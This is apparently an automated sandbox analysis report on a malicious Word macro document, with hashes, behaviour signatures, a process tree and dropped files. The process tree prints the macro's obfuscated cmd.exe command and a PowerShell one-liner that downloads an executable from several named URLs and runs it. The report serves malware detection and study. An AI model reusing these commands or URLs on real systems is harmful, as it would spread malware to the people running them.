Analysis

  • max time kernel
    121s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    22-05-2024 02:03

General

  • Target

    65a045b3e7cb246a0d73e75468b8273d_JaffaCakes118.doc

  • Size

    87KB

  • MD5

    65a045b3e7cb246a0d73e75468b8273d

  • SHA1

    0f96771da3efd722bd337ca57f3514ba30e0f351

  • SHA256

    e80762c5909a3c7f409c3f0273ed96154fc887463b6748a0a42cad16fadbf6e5

  • SHA512

    42a202314570aa5963a7de0b0a386488ea48f3193015a2005f290419ee30aa574eaefc5beba38a34f99cb97e1c6c098c701a07b782879736b6daaf36e912473a

  • SSDEEP

    1536:Yl0suyCPocn1kp59gxBK85fB7s+aM14E0/SO8Mkk:uu241k/W48cp

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 17 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Start PowerShell.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\65a045b3e7cb246a0d73e75468b8273d_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2108
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2456
      • \??\c:\windows\SysWOW64\cmd.exe
        c:\daKhKlDznAvr\XutGjNrMEs\LijtFtOjX\..\..\..\windows\system32\cmd.exe /C"^s^et ^T^qL=(^'@^')&&^s^et ^iG9^w=^wR&&se^t V^W=a^d^o&&^s^e^t n6v=/&&s^e^t ^X^T=^w&&^s^e^t ^fP^B=k^}&&^se^t ^zv^q=^h^F.^o&&^s^e^t b^4=/^o&&^se^t ^AI=^q&&^s^et i^8^P=^ &&^s^et Rj^F^q=r&&^se^t N^9=^=&&s^e^t ^7^2G=oq=&&^s^et ^Zf^a=^:&&^s^e^t ^Z^P=^is^e^.&&^s^e^t ^5^KL=(&&se^t ^A3=^ec&&^s^e^t R^a=/&&s^e^t ^TX^P=p&&^s^et ^p^i1=/&&^se^t ^Xv=^:&&^s^e^t w^I^G^m=N^e&&s^e^t ^I^A^3=(^$&&^set ^I^qlR=^h&&^s^et ^5v^l=^er^s&&^s^e^t 5Cb=^t&&^s^et z^g=^;^$E&&^se^t ^j^d6=^i&&^s^e^t ^Bex^6=p^P&&^se^t ^B^PT=^e&&s^e^t ^pT=^t&&^s^e^t ^un^K=^G&&^se^t ^w^6^A=t^o&&^s^et Vl=^a&&^s^e^t ^xi=^d&&^se^t ^pW=^$w&&^s^et p^U=^h&&s^e^t nx7^m=^w &&^se^t ^X^pu=spo&&^s^e^t ^P^D^EN=^ i&&^se^t ^W^G=S^h^F^.^se&&^s^e^t ^4^MT^P=^';^f&&^s^e^t ^LV=^en&&s^e^t ^i^6=^S&&^s^e^t ^z^udI=n&&^s^e^t 4^XCe=N&&s^e^t ^ij=^]&&set R^e^p^8=^$^p&&^s^et ^Tv=^h^F&&^s^et N^En=^'^;&&^se^t F^l=^m/&&s^e^t ^4h=^$&&^s^et ^TF=^m&&s^e^t V^s= ^ &&^s^e^t J^g=)&&s^e^t ^5^d^w=^t&&s^e^t ^t^w=^=^ &&^s^et w^Z=^t&&s^e^t ^F^i^Q=^W&&^s^et 5^Z^Q^K=^eto^f&&^s^et ^Ys^T5=^0)^;&&^s^e^t ^Xd=c&&^s^e^t ^X9=^p&&^s^et ^jg^f=^$&&s^et ^F^YH=^Ep^t)^;&&set I^OC^D=^{&&s^e^t v^L^2=^ &&^s^et ^xy^Sh=^[&&^s^e^t ^I^A^k=^h&&^s^e^t ^x^ti^l=E^T^'^,&&^se^t ^T^Jdq=n^ ^$&&^s^et ^8^X^Q^4=^ &&s^e^t ^0^8^H=^e^t&&s^e^t ^9^Z2=^p&&^s^et XNkr=^ir&&^se^t ^OWY^8=^o&&^s^e^t ^2W=^b&&s^e^t ^uJ^F^H=^{&&^se^t ^U^b^k=^'^a&&^s^et ^3^y^9F=^:&&^s^et ^F^X^Yq=^an&&s^e^t n^x^LI=^e&&^s^et 7^K^u=^ &&s^e^t ^AN=^tr^y&&^set ^Q^1=^.&&^se^t Bv^0^i=s^x&&s^e^t ^a^h=^Sp&&^s^et ^t5^g=^he^l&&^s^e^t n^X=^m&&s^e^t ^J^9=;^$&&^s^e^t ^PN^Q=^w&&s^e^t ^as^7=^ &&^s^et ^4r^y=r^o&&^s^e^t N6^D= &&^se^t lt^K^Z=}^ &&s^e^t ^U^lv=i^l&&^se^t ^O^D=t^t^p&&^s^et nM^h^j=v&&^se^t ^b1C=S&&^s^et N^H=^.&&^s^et ZN=^o&&^se^t ^LRr=^Gu&&^s^et ^YJ=^K&&^s^et ^X^W=^er^pr&&^s^et b^A=^A&&^se^t q^pw^3=^tt&&^s^et ^w2Y=^S&&^se^t ^l^Sf^9=R&&s^e^t v^p=(&&^se^t F^A^x=seB^o^d&&^se^t ^az^B=^'^.&&^se^t ^F^x5W=^D^@&&s^e^t ^u^AR=c&&^s^et ^i^Z^O=^'&&^se^t ^a^bV=^e&&^s^et ^I^QD^T=^m&&^s^e^t ^U^fM=^$^P^X&&^s^e^t ^U^L=-^O&&^s^et ^3Cv=^ &&^s^et ^bn=/^w&&^s^e^t ^f^EG^A=d()&&s^e^t ^TI0^H=r^e^a&&set ^76=^T&&^s^e^t ^um=^w.&&^se^t ^j^x=^h&&^s^e^t pcC=n()&&^se^t 5^j^i=^ow&&^set V^F=r&&^se^t 5v^j=^ ^=&&^s^et ^Uz=^y&&^s^et ^pa^l^F=c^o^m&&^s^e^t ^j^i=^w&&^s^e^t ^83=i^t&&^se^t ^jE^7^f=e^m&&^se^t V^k=^t&&^s^et ^7^jO=^ ^ &&^s^et 3^kw^z=^d&&^s^e^t ^Je=/&&^se^t ^Z^9^M=s^t&&s^e^t qr^L=)^;^$wRw^.^s&&s^e^t P^X=^;&&s^e^t ^w^E^g=o&&^se^t n^XB=n&&^s^et ^ui=^GS&&^se^t U^K=^,&&^se^t ^P^EN=^e&&^se^t ^u^X2=^h&&^se^t ^OR=^;&&^s^et ^f^0cr=r^e&&^s^et ^O^A0=a^t&&s^e^t ^Wd0^M=^'m&&^s^et n^b=r^e&&^s^e^t ar^Q^E=^:/&&^s^e^t ^j^t=^;$&&^s^et ^qn=^H&&^s^e^t n^jv=^1^;$^wR^w&&s^e^t ^x^a^Jo=k^h^ark^iv&&^s^e^t F^A^k=a^.c&&s^e^t ^Y0^G=^w&&^se^t 8^0^L^E=p^'&&se^t A^5Vc=C^F&&^s^et ^L^x^K^Q=^l &&^s^et ^qs^B=e^s&&^s^e^t ^o^bf=^.b^i&&s^e^t ^j^y=^t^-^P&&^s^et t^x=n^ur^in^a&&s^e^t ^J6^k=^}&&set ^8V^k=^\^G&&^se^t n^0=m^a&&s^e^t ^2n=^:/&&^s^et F^Z=^o&&^s^e^t a^S^iI=@^h&&^se^t U^W^d=^t&&s^e^t ^50n^h=^ht&&s^e^t ^f^q=ac^h(^$^p&&set f^5=^{&&^s^et ^Z^7tc=^w&&^s^et ^p^z^TE=^.&&^s^et N^k^a=^S&&^s^e^t A^q=C^L^8&&^s^et ^5^qw=^ -&&^s^et ^X^s^e=s $^E^p&&^s^e^t ^f^u^7=t^w&&^se^t 3^J^gY=^h&&s^e^t ^O^q^x8=c^a&&^s^et Y^d^j=a^m&&^s^e^t ^U^J^T=^.^P&&^se^t o^j^lE=c^o&&s^e^t ^2^b=/0^@^h&&^s^et n^5^9=^.^wr&&^se^t ^ow^k=^a&&^s^e^t 0^B=^j&&^se^t ^4D^S=:&&set q^w^o=n^t&&s^e^t ^P^0tS=^s^t^e^m^.^I^O&&^s^et ^x^P=^'^h&&s^et ^fk^Xb=^Qr&&^s^e^t NVZ=^=(&&s^e^t P^iAD=^t&&^s^e^t A^u=t^a&&^s^e^t ^Ac^J3=H^o&&^s^e^t ^p^EZ=^e&&^s^e^t 0^56^x=^p&&^s^e^t Rur^p=^p^t&&^s^et ^0N=^o&&s^e^t 7^A^f=^l&&^s^e^t ^X^s=^.&&^se^t NC^p^3=e^e&&s^e^t f^b^GN=^a&&^s^et I^kv^B=t&&^s^et ^p^8=/k^l^i&&^s^et ^Ii^T=^p&&se^t ^TR5^y=^2&&^s^e^t ^qR=^b&&s^e^t ^t^LFC=P^p&&^s^et X^H=^Lhy^4^s^y&&se^t N^A^U=^inf&&^se^t ^A^S=^l&&^se^t ^w4=v^a&&^se^t ^5f=^o/&&s^e^t Rtc=^.^x^ml&&^s^e^t ^5^Wv=^h&&s^e^t ^X^3^fO=^$&&^se^t ^5q=^$&&^s^et O^Z^J=^tp&&^s^e^t 3^K^L^z=^l&&^se^t ^0^onB=^ ^ ^ &&^s^e^t ^Iy^L=/^T&&^s^et ^f9^47=^y&&s^e^t ^LH^Z=^.&&^s^et ^O^P1=z^.^u^a&&s^e^t w^e=/&&^se^t ^0^G=r&&^se^t ^wRv^D=m^@^htt^p:&&^s^e^t ^W^fG=^wR^w&&^set ^P^yhp=^G&&^s^et YM^g^x=w^w.^b&&s^e^t 7^Pg^M=n&&s^e^t yv^h^2=^e&&^s^et ^j^er=^t&&^se^t Rv=^W^K&&s^e^t r^0E=.^t^y&&^s^et ^l^L=^ &&^s^et ^7^uyr=');^$^S^h^F&&^se^t ^Q^0^Jr=b^j^e&&s^e^t 8^1=^e^w-^O^b&&^s^e^t ^F^U^m=^i&&^s^et 5^H=^m&&^s^e^t ^a^ms=^p&&^s^et ^w^arc=^a&&s^e^t ^0a=^= &&^se^t ^x^ur=()^+^'&&s^e^t V^1^U=i^.c^o&&^se^t N^y=c^t^ ^-c^om&&^se^t ^79^a= ^'&&^s^e^t 0B^z^7=/&&^se^t ^q^yOR=^.tr&&^s^e^t ^3n=^l&&^s^et 7^D=^e^x^e&&c^al^l ^se^t Ne=%^TX^P%%5^j^i%%^5v^l%%^t5^g%%^L^x^K^Q%%^U^fM%%^F^U^m%%N^9%%^U^b^k%%^ui%%N^En%%^X^3^fO%%^qn%%^7^2G%%^x^P%%^5^d^w%%U^W^d%%^a^ms%%ar^Q^E%%^Je%%^x^a^Jo%%^o^bf%%^O^P1%%R^a%%^u^X2%%^t^LFC%%^F^x5W%%^j^x%%q^pw^3%%^9^Z2%%^2n%%b^4%%t^x%%7^Pg^M%%^3n%%V^1^U%%^TF%%^Iy^L%%A^q%%^w^arc%%^fk^Xb%%b^A%%a^S^iI%%^O^D%%^4D^S%%0B^z^7%%n6v%%^X^T%%^Y0^G%%^um%%^f^u^7%%NC^p^3%%^w^6^A%%^PN^Q%%F^Z%%^OWY^8%%^p^z^TE%%o^j^lE%%F^l%%X^H%%^wRv^D%%^p^i1%%^p^8%%n^0%%^I^qlR%%f^b^GN%%^w4%%3^K^L^z%%^F^X^Yq%%^xi%%XNkr%%^I^QD^T%%F^A^k%%^0N%%5^H%%^q^yOR%%^2^b%%P^iAD%%O^Z^J%%^Zf^a%%w^e%%^bn%%YM^g^x%%^f^0cr%%q^w^o%%^X^W%%^Z^P%%N^A^U%%^5f%%^I^A^k%%A^5Vc%%^az^B%%^a^h%%^A^S%%^83%%^T^qL%%z^g%%Rur^p%%NVZ%%^xy^Sh%%^b1C%%^f9^47%%^P^0tS%%^U^J^T%%^ow^k%%5Cb%%^5^Wv%%^ij%%^Xv%%^3^y^9F%%^un^K%%^0^8^H%%^76%%^jE^7^f%%^Bex^6%%^O^A0%%p^U%%^x^ur%%^8V^k%%^LRr%%N^H%%7^D%%^7^uyr%%5v^j%%4^XCe%%8^1%%0^B%%^A3%%V^k%%^5^qw%%^pa^l^F%%^3Cv%%^Wd0^M%%Bv^0^i%%n^X%%7^A^f%%^TR5^y%%Rtc%%^50n^h%%w^Z%%8^0^L^E%%^J^9%%^iG9^w%%nx7^m%%^0a%%w^I^G^m%%^j^i%%^U^L%%^Q^0^Jr%%N^y%%^79^a%%V^W%%3^kw^z%%^qR%%^LH^Z%%^Z^9^M%%V^F%%^p^EZ%%Y^d^j%%^4^MT^P%%ZN%%^0^G%%^P^EN%%^f^q%%Rv%%^P^D^EN%%^T^Jdq%%^Ac^J3%%^AI%%J^g%%I^OC^D%%^AN%%f^5%%^5q%%^w2Y%%^zv^q%%0^56^x%%^LV%%v^p%%^i^Z^O%%^P^yhp%%^x^ti^l%%R^e^p^8%%^F^i^Q%%^YJ%%U^K%%^Ys^T5%%^4h%%^W^G%%^z^udI%%^f^EG^A%%^OR%%^pW%%^l^Sf^9%%^Z^7tc%%^X^s%%^w^E^g%%^Ii^T%%n^x^LI%%pcC%%^j^t%%^W^fG%%r^0E%%^X9%%yv^h^2%%i^8^P%%^t^w%%n^jv%%n^5^9%%^j^d6%%^j^er%%^B^PT%%^I^A^3%%N^k^a%%^Tv%%^Q^1%%n^b%%^X^pu%%n^XB%%F^A^x%%^Uz%%qr^L%%Vl%%nM^h^j%%5^Z^Q^K%%^U^lv%%^a^bV%%^5^KL%%^jg^f%%^F^YH%%^i^6%%A^u%%Rj^F^q%%^j^y%%^4r^y%%^Xd%%^qs^B%%^X^s^e%%I^kv^B%%P^X%%^2W%%^TI0^H%%^fP^B%%^O^q^x8%%^pT%%^u^AR%%3^J^gY%%^uJ^F^H%%^J6^k%%lt^K^Z%%^7^jO%%^as^7%%V^s%%^0^onB%%^l^L%%^8^X^Q^4%%N6^D%%v^L^2%%7^K^u%&&call %N^e%"
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2560
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell $PXi='aGS';$Hoq='http://kharkiv.biz.ua/hPpD@http://onurinanli.com/TCL8aQrA@http://www.tweetowoo.com/Lhy4sym@http://klimahavalandirma.com.tr/0@http://www.brenterprise.info/hCF'.Split('@');$Ept=([System.IO.Path]::GetTempPath()+'\GGu.exe');$ShF =New-Object -com 'msxml2.xmlhttp';$wRw = New-Object -com 'adodb.stream';foreach($pWK in $Hoq){try{$ShF.open('GET',$pWK,0);$ShF.send();$wRw.open();$wRw.type = 1;$wRw.write($ShF.responseBody);$wRw.savetofile($Ept);Start-Process $Ept;break}catch{}}
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2152

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      0ba2e239e049a3801833fc4e06ce7d77

      SHA1

      5291d8225505b0c7c1be1dbad5e4b9aae52bb0d9

      SHA256

      ea6b0636ef13ae02646f92f4c9b761df4b099300cbe1d46fbd0d326e522c3091

      SHA512

      701a5a1525f6520805dd8842625668621e3c2cc046c53dae09c669a09fab509fef9e031e53e285d3bf976777a475543a9c193d853f52e854421a425d06ddcadb

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      0d4de87e563dc61aa4c6186451af73b3

      SHA1

      112bd9d11280f8f59f8c133cdf0298b8676f94ed

      SHA256

      f35d219d4f0fe2e37d273d7614cb760a3fb5444cc60efda2a2c670fe6f690712

      SHA512

      799cc5673d2b3a519a7f41d2d2f2bfcc709c11919613f5d3c8d0876ee82e37b7406b97be6c01e2810233b8fbdbf0dbccb65f10eb852e6a2f34d0323012aa14ba

    • C:\Users\Admin\AppData\Local\Temp\Cab2AE9.tmp
      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    • C:\Users\Admin\AppData\Local\Temp\Tar2BEA.tmp
      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      ab6d4c184150c43d5e9d614f1df0472e

      SHA1

      a6038afae81307c422fadb5bc45374806c553f99

      SHA256

      d42e8e0257d240ff84c3641fb8b31674b6c6e791c435d803e342792090ef8a08

      SHA512

      fa132df349393b6bd311ccf5551f85c064aa9e846308d2f6fcdcb86f8120f549d049ab60382fc7940f51fe62e93a63a40fe49b4972baed639bdc159c2bd7e63f

    • memory/2108-10-0x00000000006B0000-0x00000000007B0000-memory.dmp
      Filesize

      1024KB

    • memory/2108-7-0x00000000006B0000-0x00000000007B0000-memory.dmp
      Filesize

      1024KB

    • memory/2108-12-0x00000000006B0000-0x00000000007B0000-memory.dmp
      Filesize

      1024KB

    • memory/2108-8-0x00000000006B0000-0x00000000007B0000-memory.dmp
      Filesize

      1024KB

    • memory/2108-11-0x00000000006B0000-0x00000000007B0000-memory.dmp
      Filesize

      1024KB

    • memory/2108-9-0x00000000006B0000-0x00000000007B0000-memory.dmp
      Filesize

      1024KB

    • memory/2108-0-0x000000002F901000-0x000000002F902000-memory.dmp
      Filesize

      4KB

    • memory/2108-13-0x00000000006B0000-0x00000000007B0000-memory.dmp
      Filesize

      1024KB

    • memory/2108-6-0x00000000006B0000-0x00000000007B0000-memory.dmp
      Filesize

      1024KB

    • memory/2108-2-0x00000000711DD000-0x00000000711E8000-memory.dmp
      Filesize

      44KB

    • memory/2108-174-0x00000000711DD000-0x00000000711E8000-memory.dmp
      Filesize

      44KB

    • memory/2108-175-0x00000000006B0000-0x00000000007B0000-memory.dmp
      Filesize

      1024KB

    • memory/2108-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/2108-190-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/2108-191-0x00000000711DD000-0x00000000711E8000-memory.dmp
      Filesize

      44KB